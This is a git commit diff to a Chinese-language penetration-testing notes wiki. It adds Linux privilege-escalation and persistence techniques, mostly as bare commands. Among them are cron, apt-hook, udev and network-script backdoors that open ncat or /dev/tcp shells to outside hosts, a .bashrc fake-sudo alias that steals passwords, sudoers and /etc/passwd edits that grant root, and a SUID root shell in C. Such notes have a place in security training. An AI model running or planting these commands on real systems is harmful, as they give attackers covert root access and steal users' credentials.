update

Author: xiaoy-sec

wiki/README.md

@@ -169,7 +169,7 @@
     - [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
     - [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
     - [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
-    - [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
+    - [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
     - [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
     - [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
     - [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)
@@ -515,6 +515,11 @@
     - [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
     - [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
     - [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
+    - [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
+    - [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
+    - [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
+    - [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
+    - [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)
   - [web服务&中间件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/README.md)
     - [Apache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Apache.md)
     - [IIS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/IIS.md)

wiki/权限提升/Linux提权/Linux计划任务.md

@@ -1,3 +1,13 @@
+	crontab -l
+	ls -alh /var/spool/cron;
+	ls -al /etc/ | grep cron
+	ls -al /etc/cron*
+	cat /etc/cron*
+	cat /etc/at.allow
+	cat /etc/at.deny
+	cat /etc/cron.allow
+	cat /etc/cron.deny*
+	
 	>for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 列举所有用户的crontab
 	$cat /etc/crontab
 	$echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh

wiki/权限提升/Linux提权/README.md

@@ -3,7 +3,7 @@
 - [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
 - [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
 - [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
-- [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
+- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
 - [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
 - [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
 - [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)

wiki/权限提升/Linux提权/Sudo提权.md

@@ -31,4 +31,9 @@
 	>id
 	>whoami
 	>sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
-	>sudo scp /etc/shadow aarti@192.168.1.105:~/
+	>sudo scp /etc/shadow aarti@192.168.1.105:~/
+
+	工具
+	https://github.com/TH3xACE/SUDO_KILLER
+	sudo_inject
+	https://github.com/nongiach/sudo_inject

wiki/权限提升/Linux提权/一些检测工具.md

@@ -3,4 +3,10 @@
 	枚举基本系统信息并搜索常见的权限提升向量，例如世界可写文件、错误配置、明文密码和适用的漏洞利用
 	  http://www.securitysift.com/download/linuxprivchecker.py
 	检查文件权限、cron 作业（如果可见）、弱凭据等
-	  https://github.com/rebootuser/LinEnum
+	  https://github.com/rebootuser/LinEnum
+	提权脚本
+	  https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
+	枚举工具
+	  https://github.com/diego-treitos/linux-smart-enumeration
+	https://github.com/AlessandroZ/BeRoot
+	https://github.com/pentestmonkey/unix-privesc-check

wiki/权限提升/Linux提权/passwd文件提权.md wiki/权限提升/Linux提权/可写文件提权.md

@@ -1,3 +1,8 @@
+  #### 列出系统中可写文件
+  	>find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
+	>find / -perm -2 -type f 2>/dev/null
+	>find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
+  #### passwd文件
 	$ls –lh /etc/passwd 若是任何用户可读写
 	$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
 	$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
@@ -11,4 +16,17 @@
 	>useradd newuser;echo "newuser:password"|chpasswd
 	>useradd -p `openssl passwd 123456` guest
 	>useradd -p "$(openssl passwd 123456)" guest
-	>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
+	>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
+  #### /etc/sysconfig/network-scripts/
+  	NAME=Network /bin/id  <= 注意空格
+	ONBOOT=yes
+	DEVICE=eth0
+
+	EXEC :
+	./etc/sysconfig/network-scripts/ifcfg-1337
+  #### sudoers
+  	echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
+
+	无需密码使用sudo
+	echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
+	echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers

wiki/权限提升/Linux提权/查找可能泄露的密码.md

@@ -8,6 +8,8 @@
 	>cat ~/.atftp_history
 	>cat ~/.mysql_history
 	>cat ~/.php_history
+	>grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
+	>find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
   ##### 尝试查找私钥
   	>cat ~/.ssh/authorized_keys
 	>cat ~/.ssh/identity.pub

wiki/权限提升/Linux提权/通配符提权.md

@@ -27,4 +27,7 @@
 	>root
 	>find f1 -exec "/bin/sh" \;
 	>id
-	>whoami
+	>whoami
+
+	工具
+	https://github.com/localh0t/wildpwn

wiki/权限提升/README.md

@@ -44,7 +44,7 @@
   - [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
   - [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
   - [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
-  - [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
+  - [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
   - [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
   - [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
   - [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)

wiki/权限维持/Linux/Linux-cron后门.md

@@ -3,4 +3,6 @@
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/571.png)
 
 	#!bash
-	(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
+	(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
+
+	(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null

wiki/权限维持/Linux/README.md

@@ -9,4 +9,9 @@
 - [SSH公私钥登录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH公私钥登录.md)
 - [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
 - [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
-- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
+- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
+- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
+- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
+- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
+- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
+- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)

wiki/权限维持/Linux/SUID-Shell.md

@@ -1,3 +1,10 @@
 	>cp /bin/bash /tmp/tmp
 	>chmod u+s /tmp/tmp
-	>/tmp/tmp -p
+	>/tmp/tmp -p
+	或者
+	>TMPDIR2="/var/tmp"
+	>echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
+	>gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
+	>rm $TMPDIR2/croissant.c
+	>chown root:root $TMPDIR2/croissant
+	>chmod 4777 $TMPDIR2/croissant

wiki/权限维持/Linux/apt后门.md

@@ -0,0 +1,3 @@
+	如果您可以使用以下命令在apt.conf.d目录中创建一个文件：APT::Update::Pre-Invoke {"CMD"}; 下次"apt-get update"完成时，CMD 将被执行！
+
+	echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor

wiki/权限维持/Linux/bash_rc.md

@@ -0,0 +1,23 @@
+	TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
+	cat << EOF > /tmp/$TMPNAME2
+	  alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale  = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
+	EOF
+	if [ -f ~/.bashrc ]; then
+	    cat /tmp/$TMPNAME2 >> ~/.bashrc
+	fi
+	if [ -f ~/.zshrc ]; then
+	    cat /tmp/$TMPNAME2 >> ~/.zshrc
+	fi
+	rm /tmp/$TMPNAME2
+
+	或在其 .bashrc 文件中添加以下行。
+	>chmod u+x ~/.hidden/fakesudo
+	>echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
+	创建fakesudo脚本。
+	read -sp "[sudo] password for $USER: " sudopass
+	echo ""
+	sleep 2
+	echo "Sorry, try again."
+	echo $sudopass >> /tmp/pass.txt
+
+	/usr/bin/sudo $@

wiki/权限维持/Linux/后门驱动程序.md

@@ -0,0 +1 @@
+	echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

wiki/权限维持/Linux/启动项服务后门.md

@@ -0,0 +1,2 @@
+	RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
+	sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

wiki/权限维持/Linux/用户启动文件.md

@@ -0,0 +1,12 @@
+	写入文件
+	~/.config/autostart/NAME_OF_FILE.desktop
+
+	In : ~/.config/autostart/*.desktop
+
+	[Desktop Entry]
+	Type=Application
+	Name=Welcome
+	Exec=/var/lib/gnome-welcome-tour
+	AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
+	OnlyShowIn=GNOME;
+	X-GNOME-Autostart-enabled=false

wiki/权限维持/README.md

@@ -63,6 +63,11 @@
   - [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
   - [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
   - [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
+  - [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
+  - [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
+  - [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
+  - [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
+  - [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)
 - [web服务&中间件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/README.md)
   - [Apache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Apache.md)
   - [IIS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/IIS.md)